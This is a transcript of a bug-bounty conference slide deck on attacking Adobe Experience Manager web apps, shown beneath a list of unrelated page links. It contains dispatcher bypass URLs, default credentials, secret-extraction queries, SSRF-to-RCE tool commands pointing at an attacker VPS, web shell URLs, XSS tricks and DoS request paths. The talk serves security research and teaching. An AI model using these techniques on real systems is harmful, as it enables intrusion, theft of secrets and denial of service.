Презентация Филимонов (английский).pptx
bydragonnonext
 
PDF
Top 10 Countries to Hire Remote Developers in 2025 copy.pdf
byOuranos Technologies Pvt Ltd
 
PDF
Articulo aobre los ladrillos y como se fabrican
byDiegoAlexanderGarcia12
 
PPTX
Elastic meetup - From Search to Smart: Python + Elastic ELSER.pptx
bysmollinga
 
PDF
10 Interesting Facts About Infinite Craft
byMiranda Croftoon
 
C++ Chapter about pointers in programming
byfirehiwot8
 
Categorisation_of_Cyber_Attacks for hnd pearson level 4 students
byhawa175590
 
C++ chapter 1-Introduction to Computer Programming.pptx
byfirehiwot8
 
Tools in communication technologies - CT
byswisssom2025
 
Python Oops concepts of power point presentation
bySwapnitaKendre
 
Comprehensive IT Infrastructure Solutions.pdf
byDurocorre
 
Intellectual Property Code of the Philippines_20251030_085011_0000.pptx
byronthefourth
 
Empower Your Brand with YouRefresh’s Online Hub Builder
byyourefreshdm
 
C++ Chapter 6-pointers about pointers in programming
byfirehiwot8
 
Презентация Филимонов (английский).pptx
bydragonnonext
 
Top 10 Countries to Hire Remote Developers in 2025 copy.pdf
byOuranos Technologies Pvt Ltd
 
Articulo aobre los ladrillos y como se fabrican
byDiegoAlexanderGarcia12
 
Elastic meetup - From Search to Smart: Python + Elastic ELSER.pptx
bysmollinga
 
10 Interesting Facts About Infinite Craft
byMiranda Croftoon
 
In this document
Powered by AI

Overview of Adobe Experience Manager security issues, methodology, and hacker tools.

Showcasing public bug bounty programs that include AEM, with personal achievements reporting non-duplicate bugs.Details on 2018 achievements in bug reporting, categorized by priority levels and specific vulnerabilities.

Introduction to AEM architecture, including key components like AEM dispatcher and core instances.

Discusses the common security misconfigurations in AEM, highlighting potential vulnerabilities from dispatcher.

Detailed exploration of dispatcher bypass techniques utilizing CVE-2016-0957 and related security policies.

Introduction of AEM hacker toolset including scripts for automation and exploitation of vulnerabilities.

Refers to specific scripts to exploit SSRF leading to RCE, with usage examples and steps.

Methodology of exposing security flaws in bundles, including potential XSS and RCE from misconfigurations. Techniques for conducting XSS attacks using different payloads, validation points, and suggestions.Methods for implementing application-level Denial of Service attacks on AEM.

Emphasizing AEM as a target for bug hunters, thanking the audience.

AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs

  • 1.
    AEM hacker approaching AdobeExperience Manager webapps in bug bounty programs Mikhail Egorov @0ang3el
  • 2.
    Mikhail Egorov • Whitehat,security researcher, bug hunter, conference speaker • Bugcrowd – https://www.bugcrowd.com/0ang3el • H1 – https://www.hackerone.com/0ang3el • Twitter - @0ang3el • GitHub - https://github.com/0ang3el • Slideshare - https://www.slideshare.net/0ang3el • Speakerdeck - https://speakerdeck.com/0ang3el • LinkedIn - https://www.linkedin.com/in/0ang3el 2/124
  • 3.
    Why this talk? •A lot of AEM targets are in scope of BBP or VPD • AEM webapps are usually insecure • Security misconfigurations (AEM is complex) • Not installed security updates • Attract attention to AEM webapps insecurity • Motivate bug hunters to test AEM webapps 3/124
  • 4.
    Topics to discuss •Methodology w/ bug examples • Automation • AEM Hacker Toolset – https://github.com/0ang3el/aem-hacker.git • AEM RCE bundle – https://github.com/0ang3el/aem-rce-bundle.git • Only known vulnerabilities and techniques are discussed!!! 4/124
  • 5.
    Public BBP withAEM targets in scope 5/124
  • 6.
    Public VPD withAEM targets in scope 6/124
  • 7.
    Personal achievements in2018 • Reported 84 non-duplicate bugs on Bugcrowd and H1 for AEM targets • P1s – 38 issues • P2s – 37 issues • P3s – 7 issues • P4s – 2 issue • Got 2 CVEs from Adobe PSIRT 7/124
  • 8.
    Personal achievements in2018 • P1s • RCE • Secrets disclosure (passwords, tokens) • P2s • Internal SSRF, High impact • Stored XSS • Application-level DoS, Easy Difficulty • P3s • Internal SSRF, Medium impact • Reflected XSS • Application-level DoS, Medium Difficulty • P4s • Reflected XSS, Flash-based 8/124
  • 9.
    Previous works 2015 -https://www.slideshare.net/0ang3el/hacking-aem-sites 2016 - http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com- Remote-Code-Execution-Write-Up.html 2018 - https://speakerdeck.com/fransrosen/a-story-of-the-passive- aggressive-sysadmin-of-aem 2018 - https://medium.com/@jonathanbouman/reflected-xss-at-philips-com- e48bf8f9cd3c 2018 - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem- webapps 9/124
  • 10.
  • 11.
    AEM architecture • Basedon open source projects • Apache Felix • Apache Sling • Apache OAK JCR https://helpx.adobe.com/experience-manager/using/osgi_getting_started.html 11/124
  • 12.
    Common AEM deployment Mainblocks: • Author AEM instance • Publish AEM instance • AEM dispatcher (~WAF) Interacts with Publish server via AEM Dispatcher! 4503/tcp 4502/tcp 443/tcp ? 12/124
  • 13.
    AEM dispatcher • Intheory … a front end system offers an extra layer of security to your Adobe Experience Manager infrastructure • Often in practice … it’s the only security layer!!! • Admins rarely keep all components on Publish instance updated and securely configured! • Dispatcher bypasses allow to talk to those “insecure” components on Publish instance 13/124
  • 14.
    AEM Dispatcher bypasses •CVE-2016-0957 • Bypasses for “interesting” servlets • Add multiple slashes • SSRF • Other 14/124
  • 15.
    Using CVE-2016-0957 /filter { # Denyeverything first and then allow specific entries /0001 { /type "deny" /glob "*" } /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only /0041 { /type "allow" /url "*.css" } # enable css /0042 { /type "allow" /url "*.gif" } # enable gifs /0043 { /type "allow" /url "*.ico" } # enable icos /0044 { /type "allow" /url "*.js" } # enable javascript /0045 { /type "allow" /url "*.png" } # enable png /0046 { /type "allow" /url "*.swf" } # enable flash /0047 { /type "allow" /url "*.jpg" } # enable jpg /0048 { /type "allow" /url "*.jpeg" } # enable jpeg /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization Policy dispatcher.any before CVE-2016-0957 15/124
  • 16.
    Using CVE-2016-0957 # Denycontent grabbing /0081 { /type "deny" /url "*.infinity.json" } /0082 { /type "deny" /url "*.tidy.json" } /0083 { /type "deny" /url "*.sysview.xml" } /0084 { /type "deny" /url "*.docview.json" } /0085 { /type "deny" /url "*.docview.xml" } /0086 { /type "deny" /url "*.*[0-9].json" } # Deny query (and additional selectors) /0090 { /type "deny" /url "*.query*.json" } } Policy dispatcher.any before CVE-2016-0957 16/124
  • 17.
  • 18.
    Bypasses for “interesting”servlets Policy dispatcher.any after CVE-2016-0957 /filter { # Deny everything first and then allow specific entries /0001 { /type "deny" /glob "*" } # Allow non-public content directories /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only # Enable extensions in non-public content directories, using a regular expression /0041 { /type "allow" /extension '(clientlibs|css|gif|ico|js|png|swf|jpe?g|woff2?)’ } 18/124
  • 19.
    Bypasses for “interesting”servlets Policy dispatcher.any after CVE-2016-0957 # Enable features /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization # Deny content grabbing, on all accessible pages, using regular expressions /0081 { /type "deny" /selectors '((sys|doc)view|query|[0-9-]+)’ /extension '(json|xml)’ } 19/124
  • 20.
    Bypasses for “interesting”servlets Policy dispatcher.any after CVE-2016-0957 # Deny content grabbing for /content /0082 { /type "deny" /path "/content" /selectors '(feed|rss|pages|languages|blueprint|infinity|tidy)’ /extension '(json|xml|html)’ } } 20/124
  • 21.
    Bypasses for “interesting”servlets https://aemsite/bin/querybuilder.json https://aemsite/bin/querybuilder.json/a.css https://aemsite/bin/querybuilder.json;%0aa.css https://aemsite/bin/querybuilder.json.servlet.css https://aemsite/bin/querybuilder.json.servlet.html https://aemsite/bin/querybuilder.json.servlet.ico https://aemsite/bin/querybuilder.json.servlet.png Blocked Allowed 21/124
  • 22.
    Add multiple slashes •///etc.json instead of /etc.json • ///bin///querybuilder.json instead of /bin/querybuilder.json 22/124
  • 23.
    Using SSRF • Weneed SSRF in a component that is allowed by AEM dispatcher policy • SSRF should allow to send GET request and see response • Opensocial (Shindig) proxy • SSRF in ReportingServicesProxyServlet (CVE-2018-12809) 23/124
  • 24.
  • 25.
    AEM RCE bundle •AEM RCE bundle – https://github.com/0ang3el/aem-rce-bundle.git • Has pre-build OSGI bundle for AEM 6.2 or newer • Allows to get RCE when you have access to Felix Console • Happens when you guessed admin credentials 25/124
  • 26.
    AEM RCE bundle,build yourself mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate -DarchetypeGroupId=com.adobe.granite.archetypes -DarchetypeArtifactId=aem-project-archetype -DarchetypeVersion=11 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate -DarchetypeGroupId=com.day.jcr.vault -DarchetypeArtifactId=multimodule-content-package-archetype -DarchetypeVersion=1.0.2 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ For AEM 6.0 or newer For AEM 5.6 26/124
  • 27.
  • 28.
    AEM hacker toolset •Toolset – https://github.com/0ang3el/aem-hacker.git • Includes scripts • aem_hacker.py • aem_discoverer.py • aem_enum.py • aem_ssrf2rce.py, aem_server.py, response.bin • aem-rce-sling-script.sh 28/124
  • 29.
    aem_hacker.py • Main tool– scans AEM webapp for misconfigurations and vulnerabilities • Tries to bypass AEM dispatcher • You need to run it from VPS to detect SSRFs! • You need to do extra manual work to detect if findings are exploitable 29/124
  • 30.
    aem_hacker.py python3 aem_hacker.py -h usage:aem_hacker.py [-h] [-u URL] [--proxy PROXY] [--debug] [--host HOST] [--port PORT] [--workers WORKERS] AEM hacker by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit -u URL, --url URL url to scan --proxy PROXY http and https proxy --debug debug output --host HOST hostname or IP to use for back connections during SSRF detection --port PORT opens port for SSRF detection --workers WORKERS number of parallel workers 30/124
  • 31.
    aem_hacker.py python3 aem_hacker.py -uhttps://aem.webapp --host your_vps_hostname_ip • Common usage 31/124
  • 32.
    aem_hacker.py – checks1/3 • Exposed DefaultGetServlet • Exposed QueryBulderJsonServlet and QueryBuilderFeedServlet • Exposed GQLServlet • Exposed POSTServlet • Exposed LoginStatusServlet • Users with default password • Exposed Felix Console • Enabled WCMDebugFilter 32/124
  • 33.
    aem_hacker.py – checks2/3 • Exposed WCMSuggestionsServlet • Exposed AuditlogServlet • Exposed CRXDE logs • Exposed CRXDE and CRX • SSRF SalesforceSecretServlet • SSRF ReportingServicesServlet • SSRF SitecatalystServlet • SSRF AutoprovisioningServlet 33/124
  • 34.
    aem_hacker.py – checks3/3 • SSRF OpensocialProxy • SWF XSSes • Deser ExternalJobServlet • Exposed Webdav • Exposed Groovy Console • Exposed ACS AEM Tools 34/124
  • 35.
    aem_discoverer.py • Allows toscan urls and find AEM webapps among them • Tries to bypass AEM dispatcher • Common usage python3 aem_discoverer.py --file urls.txt --workers 150 35/124
  • 36.
    aem_discoverer.py python3 aem_discoverer.py -h usage:aem_discoverer.py [-h] [--file FILE] [--proxy PROXY] [--debug] [--workers WORKERS] AEM discoverer by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit --file FILE file with urls --proxy PROXY http and https proxy --debug debug output --workers WORKERS number of parallel workers 36/124
  • 37.
    aem_enum.py • Automate usernamesand secrets grabbing • Traverses JCR using DefaultGetServlet of AEM 37/124
  • 38.
    aem_enum.py python3 aem_enum.py -h usage:aem_enum.py [-h] [--url URL] [--base BASE] [--grabdepth GRABDEPTH] [--maxdepth MAXDEPTH] [--workers WORKERS] [--out OUT] [--proxy PROXY] [--debug] AEM exploration tool by @0ang3el (grabs users and secrets), see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit --url URL AEM webapp URL, required parameter --base BASE set base node (/etc or /apps or /home or /var), if not set, base node is selected automatically --grabdepth GRABDEPTH JCR subtree depth on each iteration, 2 should be a safe value for all nodes --maxdepth MAXDEPTH maximum depth for JCR search, increase it to find more --workers WORKERS number of parallel workers --out OUT CSV file with results, delimiter symbol is | --proxy PROXY http and https proxy --debug debug output 38/124
  • 39.
    aem_enum.py • Common usage •Change start node python3 aem_enum.py --url https://aem.webapp python3 aem_enum.py --url https://aem.webapp --base /etc 39/124
  • 40.
    aem_ssrf2rce.py & aem_server.py •aem_ssrf2rce.py & aem_server.py + response.bin • Helps to exploit SSRF in SitecatalystServlet or AutoprovisioningServlet as RCE • It should work on AEM before AEM-6.2-SP1-CFP7 running on Jetty • Exploits reverse replication to get RCE after joining topology using SSRF 40/124
  • 41.
    aem_ssrf2rce.py python3 aem_ssrf2rce.py -h usage:aem_ssrf2rce.py [-h] [--url URL] [--fakeaem FAKEAEM] [--proxy PROXY] optional arguments: -h, --help show this help message and exit --url URL URL for SitecatalystServlet or AutoprovisioningServlet, including path, without query part --fakeaem FAKEAEM hostname/ip of fake AEM server --proxy PROXY http and https proxy 41/124
  • 42.
    aem_ssrf2rce.py & aem_server.py •Place aem_server.py and response.bin on your VPS • Run aem_server.py script python3 aem_server.py starting fake AEM server... running server... 42/124
  • 43.
    aem_ssrf2rce.py & aem_server.py •Run aem_ssrf2rce.py script python3 aem_ssrf2rce.py --url https://aem.webapp/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet --fakeaem your_vps_hostname_ip 43/124
  • 44.
    aem_ssrf2rce.py & aem_server.py •If RCE is possible, you should see incoming connection to your fake AEM server • Shell is accessible from https://aem.webapp/rcenode.html?Vgu9BKV9zdvJNByNh9NB=ls 44/124
  • 45.
    aem-rce-sling-script.sh • Allows toget RCE when Felix Console is not available, but you have permissions to create new nodes under /apps JCR node • Usage • Shell is available at https://aem.webapp/rcenode.html?cmd=ls ./aem-rce-sling-script.sh https://aem.webapp username password 45/124
  • 46.
  • 47.
  • 48.
    RCE via exposedGroovy console https://github.com/OlsonDigital/aem-groovy-console 48/124
  • 49.
    RCE via exposedGroovy console • Exposes servlet at without authentication 49/124
  • 50.
    RCE via exposedGroovy console 50/124
  • 51.
    RCE via ACSAEM Tools • https://adobe-consulting-services.github.io/acs-aem-tools/ 51/124
  • 52.
    RCE via ACSAEM Tools • Exposes Fiddle with ability to execute JSP scripts at • • May or may not require authentication 52/124
  • 53.
    RCE via ACSAEM Tools 53/124
  • 54.
  • 55.
    What can youdo w/ valid creds? • RCE • Deface site – create/modify/delete content • Persistent XSS 55/124
  • 56.
    How to getvalid creds? • Default credentials • admin:admin • author:author • Bruteforce creds • properties , , , etc. contain usernames • automates usernames grabbing • AEM supports basic authorization 56/124
  • 57.
    RCE via credentialsof privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps WebDAV 57/124
  • 58.
    RCE via credentialsof privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload AEM RCE OSGI bundle WebDAVhttps://github.com/0ang3el/aem-rce-bundle.git 58/124
  • 59.
    RCE via uploadingOSGI bundle 59/124
  • 60.
    RCE via uploadingOSGI bundle 60/124
  • 61.
    RCE via credentialsof privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload JSP script to /apps WebDAV https://sling.apache.org/documentation/getting-started/discover-sling-in-15-minutes.html aem-rce-sling-script.sh 61/124
  • 62.
    RCE via credentialsof privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload JSP script to /apps WebDAV cadaver https://aem.webapp/crx/repository/crx.default https://sling.apache.org/documentation/getting-started/discover-sling-in-15-minutes.html 62/124
  • 63.
    Author user author:author SlingPOSTServlet WebDAV Create,modify, delete any node in /content Other CRXDE Lite 63/124
  • 64.
    Author user author:author SlingPOSTServlet WebDAV Create,modify, delete any node in /content Other CRXDE Lite https://sling.apache.org/documentation/bundles/manipulating-content-the-slingpostservlet-servlets-post.html 64/124
  • 65.
    Author user author:author SlingPOSTServlet WebDAV Create,modify, delete any node in /content Other CRXDE Lite cadaver https://aem.webapp/crx/repository/crx.default 65/124
  • 66.
    Author user author:author SlingPOSTServlet WebDAV Create,modify, delete any node in /content Other CRXDE Litehttps://aem.webapp/crx/de/index.jsp 66/124
  • 67.
    Non-privileged user SlingPOSTServlet WebDAV Findnode with weak ACL Other CRXDE Lite hasPermission predicate of Querybuilder 67/124
  • 68.
    Non-privileged user SlingPOSTServlet WebDAV Findnode with weak ACL Other CRXDE Lite hasPermission predicate of Querybuilder https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html#hasPermission 68/124
  • 69.
    Anonymous user SlingPOSTServlet WebDAV Findnode with weak ACL Other CRXDE Lite /content/usergenerated /content/usergenerated/etc/commerce/smartlists hasPermission predicate of Querybuilder Anonymous usually has jcr:write permission for node Anonymous usually has jcr:addChildNode permission for node 69/124
  • 70.
    Tricks to getpersistent XSS • SVG in property value • create property with SVG content • add /a.svg to the URL • HTML in property value • create property with HTML content and name aaa.html • jcr:data and jcr:mimeType (upload file) • Other 70/124
  • 71.
    Anonymous user &SVG 71/124
  • 72.
    Anonymous user &SVG 72/124
  • 73.
    Anonymous user &SVG 73/124
  • 74.
    Anonymous user &HTML prop 74/124
  • 75.
    Anonymous user &HTML prop 75/124
  • 76.
    Anonymous user &upload file 76/124
  • 77.
    Anonymous user &upload file 77/124
  • 78.
  • 79.
    Extracting secrets fromJCR • Everything is stored in JCR repository as node properties including: • Secrets (passwords, encryption keys, tokens) • Configuration • PII • Usernames 79/124
  • 80.
    Why is itpossible? • ACL is misconfigured for a JCR node, storing secrets • Admins rely on AEM dispatcher protection 80/124
  • 81.
    What to use •DefaultGetServlet • QueryBuilderJsonServlet • QueryBuilderFeedServlet • GQLSearchServlet • Other 81/124
  • 82.
    DefaultGetServlet • Allows toget JCR node with its props • Selectors • tidy • infinity • numeric value: -1, 0, 1 … 99999 • Formats • json • xml • res 82/124
  • 83.
    DefaultGetServlet https://aem.site/.tidy.3.json jcr:root selector tidy selector depth outputformat Get JCR nodes with props starting from jcr:root with depth 3 and return formatted JSON 83/124
  • 84.
    DefaultGetServlet - Howto grab • Get node names, start from • /.1.json • /.ext.json • /.childrenlist.json • Or guess node names: • Common names - /content, /home, /var, /etc • Dump props for each child node of • /etc.json or /etc.5.json or /etc.-1.json 84/124
  • 85.
    DefaultGetServlet – Whatto grab • Interesting nodes • /etc – may contain secrets (passwords, enc. keys, …) • /apps/system/config or /apps/<smth>/config (passwords, …) • /var – may contain private information (PII) • /home – password hashes, PII • Interesting props – contain AEM users names • jcr:createdBy • jcr:lastModifiedBy • cq:LastModifiedBy 85/124
  • 86.
    DefaultGetServlet – Inthe wild /apps/<redacted>/config.author.tidy.1..json/a.ico 86/124
  • 87.
    DefaultGetServlet – Inthe wild /etc/ocs/libs/puppet/bootstrap/etc/ssl/private/ocs-x509-client-key.pem/jcr:content/jcr:data.tidy.-1…json/b.gif 87/124
  • 88.
    QueryBuilder servlets • Wecan search JCR using different predicates • https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder- predicate-reference.html • QueryBuilderJsonServlet allows to get Nodes and their Props • /bin/querybuilder.json • QueryBuilderFeedServlet allows to get Nodes (no Props) • /bin/querybuilder.feed.servlet • we can use blind binary search for Props 88/124
  • 89.
    Examples of usefulsearches • type=nt:file&nodename=*.zip • path=/home&p.hits=full&p.limit=-1 • hasPermission=jcr:write&path=/content • hasPermission=jcr:addChildNodes&path=/content • hasPermission=jcr:modifyProperties&path=/content • p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alast ModifiedBy&property.operation=unequals&property.value=admin&type=n t%3abase&p.limit=1000 • path=/etc&path.flat=true&p.nodedepth=0 • path=/etc/replication/agents.author&p.hits=full&p.nodedepth=-1 89/124
  • 90.
    QueryBuilder – Inthe wild type=nt:file&nodename=*.zip 90/124
  • 91.
    QueryBuilder – Inthe wild path=/home&p.hits=full&p.limit=-1 91/124
  • 92.
    QueryBuilder – Inthe wild path=/apps/system/config 92/124
  • 93.
    QueryBuilder – Inthe wild hasPermission=jcr:write&path=/content 93/124
  • 94.
  • 95.
    Opensocial (Shindig) proxy •SSRF via Opensocial (Shindig) proxy • • • Allows to send GET request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from internal network services • Bypass AEM dispatcher and ex-filtrate secrets from JCR • Reflected XSS 95/124
  • 96.
  • 97.
    ReportingServicesProxyServlet • SSRF viaReportingServicesProxyServlet (CVE-2018-12809) • • • Allows to send GET request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from internal network services • Bypass AEM dispatcher and ex-filtrate secrets from JCR • Reflected XSS 97/124
  • 98.
  • 99.
  • 100.
    SalesforceSecretServlet 100/124 • SSRFvia SalesforceSecretServlet (CVE-2018-5006) • • Allows to send POST request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from some internal network services • POST ≡ GET • Reflected XSS
  • 101.
  • 102.
  • 103.
    SiteCatalystServlet • SSRF viaSiteCatalystServlet • • • Allows to send POST request to an arbitrary URL blindly, allows to send arbitrary headers (CRLF injection) • Suitable for • Access internal network services (hard in blackbox scenario) • RCE (requires specific AEM version and appserver) 103/124
  • 104.
  • 105.
    AutoProvisioningServlet • SSRF viaAutoProvisioningServlet • • Allows to send POST request to an arbitrary URL blindly, allows to send arbitrary headers (CRLF injection) • Suitable for • Access internal network services (hard in blackbox scenario) • RCE (requires specific AEM version and appserver) 105/124
  • 106.
  • 107.
    SSRF >>> RCE •It’s possible to escalate SSRFs in SiteCatalystServlet and AutoProvisioningServlet to RCE on Publish server • Requirements • AEM 6.2 before AEM-6.2-SP1-CFP7 fix pack • Jetty appserver (default installation) 107/124
  • 108.
  • 109.
  • 110.
    ExternalJobPostServlet • Old bug,affects AEM 5.5 – 6.1 • http://aempodcast.com/2016/podcast/aem-podcast-java-deserialization-bug/ • • Parameter accepts Java serialized stream and passes to 110/124
  • 111.
  • 112.
  • 113.
    XXE via WebDAV •Old bug, CVE-2015-1833 • It’s possible to read local files with PROPFIND/PROPPATCH • https://www.slideshare.net/0ang3el/what-should-a-hacker-know-about-webdav 113/124
  • 114.
    Check WebDAV support •Send request • header in response contain webdav-related methods • Navigate to • 401 HTTP and WWW-Authenticate: Basic realm="Adobe CRX WebDAV" 114/124
  • 115.
  • 116.
    Vectors • SWF XSSes(kudos to @fransrosen) • WCMDebugFilter XSS – CVE-2016-7882 • See Philips XSS case @JonathanBoumanium • Many servlets return HTML tags in JSON response • SuggestionHandlerServlet (reflect parameter) 116/124
  • 117.
  • 118.
  • 119.
  • 120.
  • 121.
    DoS is easy •/.ext.infinity.json • /.ext.infinity.json?tidy=true • /bin/querybuilder.json?type=nt:base&p.limit=-1 • /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix= • /content.assetsearch.json?query=*&start=0&limit=10&random=123 • /..assetsearch.json?query=*&start=0&limit=10&random=123 • /system/bgservlets/test.json?cycles=999999&interval=0&flushEvery=111111111 121/124
  • 122.
  • 123.
    Conclusion • AEM targetis a goldmine for a bug hunter • I hope my work will help to approach AEM targets 123/124
  • 124.